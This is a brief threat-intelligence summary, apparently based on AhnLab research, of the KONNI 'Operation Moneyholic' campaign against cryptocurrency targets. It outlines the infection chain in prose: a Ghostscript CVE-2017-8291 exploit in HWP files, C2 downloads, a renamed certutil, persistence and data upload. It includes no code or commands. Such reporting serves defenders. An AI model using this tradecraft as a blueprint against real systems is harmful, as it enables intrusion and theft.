Operation Moneyholic, also known internationally as KONNI, used spear-phishing HWP documents against cryptocurrency exchanges and users. The HWP file embedded an EPS object that exploited Ghostscript CVE-2017-8291 to run encrypted shellcode and download VBScript and batch files from attacker C2 infrastructure. The chain copied certutil.exe as ct.exe, established startup persistence, collected host and system information, uploaded files named with the victim computer name, and conditionally downloaded additional malware. AhnLab linked the tooling to an earlier sendfile.exe-based campaign and noted that the group used stolen information to deploy follow-on malware such as Amadey RAT when a target was valuable.